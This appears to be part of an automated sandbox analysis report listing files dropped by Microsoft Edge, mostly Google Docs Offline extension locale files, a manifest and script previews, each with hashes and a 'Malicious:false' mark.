                                                                                                                                                                                                                                                            SHA-256:026C164BAE27DBB36A564888A796AA3F188AAD9E0C37176D48910395CF772CEA
                                                                                                                                                                                                                                                            SHA-512:E55167CB5638E04DF3543D57C8027B86B9483BFCAFA8E7C148EDED66454AEBF554B4C1CF3C33E93EC63D73E43800D6A6E7B9B1A1B0798B6BDB2F699D3989B052
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "..... ...... ........ ......".. },.. "explanationofflinedisabled": {.. "message": ".... ........... ........ ......... ........ ....... Google Docs... .............., .... ............ ....... ..... ...... .... Google Docs .... ...... ............. ......, ........ ........ ... .......".. },.. "explanationofflineenabled": {.. "message": ".... ........... ......., .... .... ........ .......... .... ....... ..... ....... .... ..
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1674
                                                                                                                                                                                                                                                            Entropy (8bit):4.343724179386811
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:fcGjnU3UnGKD1GeU3pktOggV1tL2ggG7Q:f3jnDG1eUk0g6RLE
                                                                                                                                                                                                                                                            MD5:64077E3D186E585A8BEA86FF415AA19D
                                                                                                                                                                                                                                                            SHA1:73A861AC810DABB4CE63AD052E6E1834F8CA0E65
                                                                                                                                                                                                                                                            SHA-256:D147631B2334A25B8AA4519E4A30FB3A1A85B6A0396BC688C68DC124EC387D58
                                                                                                                                                                                                                                                            SHA-512:56DD389EB9DD335A6214E206B3BF5D63562584394D1DE1928B67D369E548477004146E6CB2AD19D291CB06564676E2B2AC078162356F6BC9278B04D29825EF0C
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": ".............. ............. Google .................................... ............................... Google ...... .................................................................".. },.. "explanationofflineenabled": {.. "message": "................................................................".. },.. "extdesc": {.. "message": "..... ..... ........
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1063
                                                                                                                                                                                                                                                            Entropy (8bit):4.853399816115876
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24:1HAowYuBPgoMC4AGehrgGm7tJ3ckwFrXnRs5m:GYsPgrCtGehkGc3cvXr
                                                                                                                                                                                                                                                            MD5:76B59AAACC7B469792694CF3855D3F4C
                                                                                                                                                                                                                                                            SHA1:7C04A2C1C808FA57057A4CCEEE66855251A3C231
                                                                                                                                                                                                                                                            SHA-256:B9066A162BEE00FD50DC48C71B32B69DFFA362A01F84B45698B017A624F46824
                                                                                                                                                                                                                                                            SHA-512:2E507CA6874DE8028DC769F3D9DFD9E5494C268432BA41B51568D56F7426F8A5F2E5B111DDD04259EB8D9A036BB4E3333863A8FC65AAB793BCEF39EDFE41403B
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1333
                                                                                                                                                                                                                                                            Entropy (8bit):4.686760246306605
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24:1HAk9oxkm6H4KyGGB9GeGoxPEYMQhpARezTtHUN97zlwpEH7:VKU1GB9GeBc/OARETt+9/WCb
                                                                                                                                                                                                                                                            MD5:970963C25C2CEF16BB6F60952E103105
                                                                                                                                                                                                                                                            SHA1:BBDDACFEEE60E22FB1C130E1EE8EFDA75EA600AA
                                                                                                                                                                                                                                                            SHA-256:9FA26FF09F6ACDE2457ED366C0C4124B6CAC1435D0C4FD8A870A0C090417DA19
                                                                                                                                                                                                                                                            SHA-512:1BED9FE4D4ADEED3D0BC8258D9F2FD72C6A177C713C3B03FC6F5452B6D6C2CB2236C54EA972ECE7DBFD756733805EB2352CAE44BAB93AA8EA73BB80460349504
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "........".. },.. "explanationofflinedisabled": {.. "message": ".. . ...... ....... ... ............. Google ........... ... ......... . .........., ......... . ............ .. ........ ........ Google .......... . ......... ......-............., .... ...... . .......".. },.. "explanationofflineenabled": {.. "message": ".. . ...... ......, ..... ... .... ...... .......... ........ ..... ... .......... .....".. },.. "extdesc": {.. "message": "........., ......... . ............ ........., .......... ....... .. ........... ... ....... .. ..........".. },.. "extname": {.. "message": "Goo
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1263
                                                                                                                                                                                                                                                            Entropy (8bit):4.861856182762435
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24:1HAl3zNEUhN3mNjkSIkmdNpInuUVsqNtOJDhY8Dvp/IkLzx:e3uUhQKvkmd+s11Lp1F
                                                                                                                                                                                                                                                            MD5:8B4DF6A9281333341C939C244DDB7648
                                                                                                                                                                                                                                                            SHA1:382C80CAD29BCF8AAF52D9A24CA5A6ECF1941C6B
                                                                                                                                                                                                                                                            SHA-256:5DA836224D0F3A96F1C5EB5063061AAD837CA9FC6FED15D19C66DA25CF56F8AC
                                                                                                                                                                                                                                                            SHA-512:FA1C015D4EA349F73468C78FDB798D462EEF0F73C1A762298798E19F825E968383B0A133E0A2CE3B3DF95F24C71992235BFC872C69DC98166B44D3183BF8A9E5
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "... ......".. },.. "explanationofflinedisabled": {.. "message": ".. .. .... .... Google Docs .. .... ....... ..... ....... .... ..... .... ... .. .. ....... .. ..... ... .. Google Docs ... ... .. ....... .. ..... ... .. .... ...... ..... .. .. .....".. },.. "explanationofflineenabled": {.. "message": ".. .. .... ... .... .. ... ... ...... ..... ... ..... .. .... ... .. ... ..... ... .... ....".. },.. "extdesc": {.. "message": ".......... .......... ... ....... . .... ... ....... .. ..... .. .... ...... ..... .... ... ..... .......".. },.. "extname": {.. "message": "Google Docs .. ....".. },.. "learnmore": {..
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1074
                                                                                                                                                                                                                                                            Entropy (8bit):5.062722522759407
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24:1HAhBBLEBOVUSUfE+eDFmj4BLErQ7e2CIer32KIxqJ/HtNiE5nIGeU+KCVT:qHCDheDFmjDQgX32/S/hI9jh
                                                                                                                                                                                                                                                            MD5:773A3B9E708D052D6CBAA6D55C8A5438
                                                                                                                                                                                                                                                            SHA1:5617235844595D5C73961A2C0A4AC66D8EA5F90F
                                                                                                                                                                                                                                                            SHA-256:597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
                                                                                                                                                                                                                                                            SHA-512:E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):879
                                                                                                                                                                                                                                                            Entropy (8bit):5.7905809868505544
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:12:1HASvgteHCBxNtSBXuetOrgIkA2OrWjMOCBxetSBXK01fg/SOiCSUEQ27e1CBhUj:1HAFsHtrIkA2jqldI/727eggcLk9pf
                                                                                                                                                                                                                                                            MD5:3E76788E17E62FB49FB5ED5F4E7A3DCE
                                                                                                                                                                                                                                                            SHA1:6904FFA0D13D45496F126E58C886C35366EFCC11
                                                                                                                                                                                                                                                            SHA-256:E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
                                                                                                                                                                                                                                                            SHA-512:F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "..".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ................ Google ....................".. },.. "explanationofflineenabled": {.. "message": ".............................".. },.. "extdesc": {.. "message": "...................... - ........".. },.. "extname": {.. "message": "Google .......".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "...............................".. }..}..
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1205
                                                                                                                                                                                                                                                            Entropy (8bit):4.50367724745418
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
                                                                                                                                                                                                                                                            MD5:524E1B2A370D0E71342D05DDE3D3E774
                                                                                                                                                                                                                                                            SHA1:60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
                                                                                                                                                                                                                                                            SHA-256:30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
                                                                                                                                                                                                                                                            SHA-512:D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):843
                                                                                                                                                                                                                                                            Entropy (8bit):5.76581227215314
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
                                                                                                                                                                                                                                                            MD5:0E60627ACFD18F44D4DF469D8DCE6D30
                                                                                                                                                                                                                                                            SHA1:2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
                                                                                                                                                                                                                                                            SHA-256:F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
                                                                                                                                                                                                                                                            SHA-512:6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):912
                                                                                                                                                                                                                                                            Entropy (8bit):4.65963951143349
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
                                                                                                                                                                                                                                                            MD5:71F916A64F98B6D1B5D1F62D297FDEC1
                                                                                                                                                                                                                                                            SHA1:9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
                                                                                                                                                                                                                                                            SHA-256:EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
                                                                                                                                                                                                                                                            SHA-512:30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):11280
                                                                                                                                                                                                                                                            Entropy (8bit):5.757003753691263
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuHEIIMuuqd7CKqvlcp7xpHsUy:m8IEI4u8R039y
                                                                                                                                                                                                                                                            MD5:8F99E1EF2AFC5F73D9391C248A0390AA
                                                                                                                                                                                                                                                            SHA1:DD15DCD68FFB7CBA69C6BBA010DF57A75390C64C
                                                                                                                                                                                                                                                            SHA-256:D57215628AF1ECD1ECD8F83DA69245161E4E0A2CE24846B2FFF6B35DA232709B
                                                                                                                                                                                                                                                            SHA-512:8F4AA8CE2EA90958BEC430CD46F1E76D8E7617C0735D8AB896F4DA1F84F3220920CCA6CA2DA2D7559355423EC115342183615F7E62E72EE6168A5930A078948B
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiIxMjgucG5nIiwicm9vdF9oYXNoIjoiZ2NWZy0xWWgySktRNVFtUmtjZGNmamU1dzVIc1JNN1ZCTmJyaHJ4eGZ5ZyJ9LHsicGF0aCI6Il9sb2NhbGVzL2FmL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJxaElnV3hDSFVNLWZvSmVFWWFiWWlCNU9nTm9ncUViWUpOcEFhZG5KR0VjIn0seyJwYXRoIjoiX2xvY2FsZXMvYW0vbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IlpPQWJ3cEs2THFGcGxYYjh4RVUyY0VkU0R1aVY0cERNN2lEQ1RKTTIyTzgifSx7InBhdGgiOiJfbG9jYWxlcy9hci9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiUjJVaEZjdTVFcEJfUUZtU19QeGstWWRrSVZqd3l6WEoxdURVZEMyRE9BSSJ9LHsicGF0aCI6Il9sb2NhbGVzL2F6L21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJZVVJ3Mmp4UU5Lem1TZkY0YS1xcTBzbFBSSFc4eUlXRGtMY2g4Ry0zdjJRIn0seyJwYXRoIjoiX2xvY2FsZXMvYmUvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IjNmRm9XYUZmUHJNelRXSkJsMXlqbUlyRDZ2dzlsa1VxdzZTdjAyUk1oVkEifSx7InBhdGgiOiJfbG9jYWxlcy9iZy9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiSXJ3M3RIem9xREx6bHdGa0hjTllOWFoyNmI0WWVwT2t4ZFN
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):854
                                                                                                                                                                                                                                                            Entropy (8bit):4.284628987131403
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
                                                                                                                                                                                                                                                            MD5:4EC1DF2DA46182103D2FFC3B92D20CA5
                                                                                                                                                                                                                                                            SHA1:FB9D1BA3710CF31A87165317C6EDC110E98994CE
                                                                                                                                                                                                                                                            SHA-256:6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
                                                                                                                                                                                                                                                            SHA-512:939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):2525
                                                                                                                                                                                                                                                            Entropy (8bit):5.417833205646285
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj1h9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/APhgiVb
                                                                                                                                                                                                                                                            MD5:C1650B58FA1935045570AA3BF642D50D
                                                                                                                                                                                                                                                            SHA1:8ECD9726D379A2B638DC6E0F31B1438BF824D845
                                                                                                                                                                                                                                                            SHA-256:FEA4B4152B884F3BF1675991AED9449B29253D1323CAD1B5523E63BC4932D944
                                                                                                                                                                                                                                                            SHA-512:65217E0EB8613326228F6179333926A68D7DA08BE65C63BD84AEC0B8075194706029583E0B86331E7EEEC4B7167E5BC51BCA4A53CE624CB41CF000C647B74880
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/*", "https://drive.google.com/*", "https://drive-autopush.corp.google.com/*", "https://drive-daily-0.corp.google.com/*", "https://drive-daily-1.corp.google.com/*", "https://drive-daily-2.corp.google.com/*", "https://drive-daily-3.corp.google.com/*", "https://drive-daily-4.corp.google.com/*", "https://drive-daily-5.corp.google.com/*", "https://drive-daily-6.corp.google.com/*", "https://drive-preprod.corp.google.com/*", "https://drive-staging.corp.google.com/*" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):97
                                                                                                                                                                                                                                                            Entropy (8bit):4.862433271815736
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
                                                                                                                                                                                                                                                            MD5:B747B5922A0BC74BBF0A9BC59DF7685F
                                                                                                                                                                                                                                                            SHA1:7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
                                                                                                                                                                                                                                                            SHA-256:B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
                                                                                                                                                                                                                                                            SHA-512:7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):122162
                                                                                                                                                                                                                                                            Entropy (8bit):5.444710692772984
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:1536:mKgC9lwS3skucsAHnA5Ayc/XzyEW8WW9Y1G6WIMctANlKIkk0ToyxecN9Bu1/9a:0UsMXz7b81tANlKr5oyPBuza
                                                                                                                                                                                                                                                            MD5:01984DBFE92DF14DBD118C381A3D48F4
                                                                                                                                                                                                                                                            SHA1:F85DB8A14D3F8A2F66AE153C56D37FAA68EFE8E3
                                                                                                                                                                                                                                                            SHA-256:3A78B6FBC16F9FB27CE3ED650ABC31174263D762B71C028CC5D8F5427CBAB082
                                                                                                                                                                                                                                                            SHA-512:91A575EC15BD3B37254623F5039B3F437A8EDED7761D1FADF8FD0D5B06247589AC055EEFD8F6627C5F6843663A90330E7603E00315D91D8D7B43F6C87D9D2888
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:'use strict';function aa(){return function(a){return a}}function k(){return function(){}}function n(a){return function(){return this[a]}}function ba(a){return function(){return a}}var q;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function fa(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var ha=fa(this);function r(a,b){if(b)a:{var c=ha;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new T
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (337)
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):338
                                                                                                                                                                                                                                                            Entropy (8bit):4.678465166211649
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK6ALY6WHXt3:2Q8KVqb2u/Rt3OnjNkdd
                                                                                                                                                                                                                                                            MD5:0396274AAF2EAE8917E5EB52CF69DFA4
                                                                                                                                                                                                                                                            SHA1:96F53CFB2D6980E12AACEDC6D91759E7F5CA1718
                                                                                                                                                                                                                                                            SHA-256:13E1562CD07FC06D692FDF1AA471E3CEAE3CF7C1E42C5345D430A947139A24D5
                                                                                                                                                                                                                                                            SHA-512:091212DD84FCE06E0D47C6E26E0959A660B36B53D7AADE1DAC5CA2795E44B4D81AB271213DAE68E70A04EE2BDE9BCE4A63587580EC06B3FBBB7A2576B62ABD16
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;window._docs_chrome_extension_version="1.89.1";}).call(this);.
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (4884)
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):130889
                                                                                                                                                                                                                                                            Entropy (8bit):5.42886594885059
                                                                                                                                                                                                                                                            Encrypted:false
